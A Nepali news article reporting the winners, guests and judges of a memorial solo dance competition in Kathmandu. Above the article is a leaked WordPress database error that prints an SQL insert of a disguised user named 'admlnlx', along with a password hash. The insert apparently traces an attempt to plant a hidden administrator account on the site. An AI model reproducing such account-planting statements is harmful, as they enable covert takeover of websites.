WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0u99xW.MxC.993IynXehreQGlTysY0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 23:33:13', '', 'admlnlx', 'admlnlx')
काठमाडौँ । स्वर्गीय त्रिलोचन फुँयालको स्मृतिमा आयोजना गरिएको “स्वर्गीय त्रिलोचन फुँयाल स्मृति एकल नृत्य प्रतियोगिता –२०८२” को पहिलो संस्करण सफलतापूर्वक सम्पन्न भएको छ । सि.एम. इन्टरटेन्मेन्ट काठमाडौँ, नेपालका सञ्चालक तथा नृत्यनिर्देशक चुडामणि फुँयाल आफ्नो स्वर्गीय बुबा त्रिलोचन फुँयालको सम्झना गर्दै यस कार्यक्रमको आयोजना गरेको हो ।
कार्यक्रमको सभापतिसमेत रहनु भएका चुडामणि फुँयालले उपस्थित सम्पूर्ण व्यक्तित्त्वहरूलाई स्वागत मन्तव्यमार्फत स्वागत तथा कृतज्ञता ज्ञापन गर्दै कार्यक्रममाथि प्रकाश पार्नुभएको थियो । यसै क्रममा आफ्ना स्वर्गीय पिता त्रिलोचन फुँयालको स्मृतिमा यो कार्यक्रम प्रत्येक वर्ष थप ऊर्जा र उत्साहका साथ निरन्तर रूपमा आयोजना गरिने बताए ।
कार्यक्रममा एम्बिसन एकाडेमीका इन्चार्ज तथा साहित्यकार खगेन्द्र प्रसाद नेपालले शुभकामना मन्तव्य दिँदै यस्ता सिर्जनात्मक तथा सांस्कृतिक कार्यक्रमले विद्यार्थीहरूको प्रतिभा उजागर गर्न महत्त्वपूर्ण भूमिका खेल्ने बताउनुभयो । उहाँले कार्यक्रमलाई निरन्तरता दिन आयोजकलाई सुझावसमेत दिए ।
त्यसैगरी कार्यक्रममा विशिष्ट अतिथिसमेत रहनुभएका एम्बिसन एकाडेमी नेटवर्कका प्राचार्य विष्णु कुमार घिमिरेले शुभकामना मन्तव्य व्यक्त गर्दै विद्यार्थीहरूलाई कला–संस्कृतिसँग जोड्ने यस्ता कार्यक्रमको प्रशंसा गरे ।
कार्यक्रमका प्रमुख अतिथिको रुपमा आतिथ्यता ग्रहण गर्नु भएका त्रिभुवन विश्वविद्यलयअन्तर्गत ललितकला क्याम्पसका पूर्व क्याम्पस प्रमुख तथा सह प्राध्यापक डा. रमेश पोखरेलले आफ्नो मन्तव्यका क्रममा नृत्य कलाले अनुशासन, आत्मविश्वास र सिर्जनशीलता विकासमा सहयोग पुर्याउने बताए ।
नयाँ बानेश्वरमा रहेको एम्बिसन एकेडेमी विद्यालयको प्राङ्गडमा आयोजना गरिएको उक्त कार्यक्रममा काठमाडौँ उपत्यकाभित्रका १५ विद्यालयका ३० जना विद्यार्थीहरूको सहभागिता रहेको थियो । प्रतियोगिताअन्तर्गत सिनियर तर्फ साईना थापा प्रथम, प्रकृति स्वार द्वितीय तथा हिमानी शिरीष तृतीय हुन सफल भएका थिए भने श्रद्धा खड्काले प्रोत्साहन पुरस्कार प्राप्त गरेकी थिइन् ।
त्यसैगरी जुनियर तर्फ शशी लामा प्रथम, रासिका पराजुली द्वितीय, रियान चतुर्वेदी तृतीय तथा केञ्जल अधिकारीले प्रोत्साहन पुरस्कार प्राप्त गर्न सफल भएका थिए ।
नृत्य प्रतियोगिताको मूल्याङ्कन नृत्य निर्देशक सङ्घ नेपालका केन्द्रीय सह–कोषाध्यक्ष केशव कोइराला तथा नृत्य निर्देशक सङ्घ नेपाल गोकर्णेश्वर नगर कमिटीका अध्यक्ष एवं फ्रेन्डसिप डान्स सेन्टरका प्रबन्ध निर्देशक बाबु सेन्चुरीले गरेको थियो ।
स्वर्गीय त्रिलोचन फुँयालको तस्वीरमा माल्यार्पण गरी शुभारम्भ गरिएको कार्यक्रमको सञ्चालन एम्बिसन एकेडेमीका शिक्षक भवानी नेपालले गर्नुभएको थियो ।
कार्यक्रममा नृत्य निर्देशक सङ्घ नेपाल काठमाडौँ जिल्ला शाखाका अध्यक्ष सरस्वती पोखरेल, केन्द्रीय सदस्य बुद्ध लामा, भक्तपुर जिल्ला निवर्तमान अध्यक्ष नारायणी थापा मगर, गोकर्णेश्वर नगर कमिटीका सह–कोषाध्यक्ष सन्देश तामाङ, भक्तपुर जिल्ला शाखा उपाध्यक्ष अष्टमान लामा तामाङ, तथा एन.डि.ए. मिडिया ग्रुपका अध्यक्ष देवराज गुरुङ लगायतको उपस्थिति रहेको थियो ।
प्रतियोगितामा प्रथम, द्वितीय, तृतीय तथा प्रोत्साहन स्थान हासिल गर्ने पुरस्कृत प्रतिभाहरूलाई प्रमुख अतिथि, विशिष्ट अतिथि तथा सभापतिको हातबाट ट्रफी, मेडल र प्रमाणपत्र प्रदान गरी सम्मान गरिएको थियो भने कार्यक्रमलाई भव्य अनि सभ्य बनाउन सहयोग गर्नुहुने व्यक्ति तथा संस्थाहरूलाई आयोजकको तर्पmबाट सम्मानसमेत गरिएको थियो । कार्यक्रममा स्वर्गीय त्रिलोचन फुँयालका परिवारजनका तर्फबाट माइली छोरी बिमला धिताल, काइँली छोरी उर्मिला दाहाल, नातिनी विभूती धिताल र नाति विभूत धितालको पनि उपस्थिति रहेको थियो ।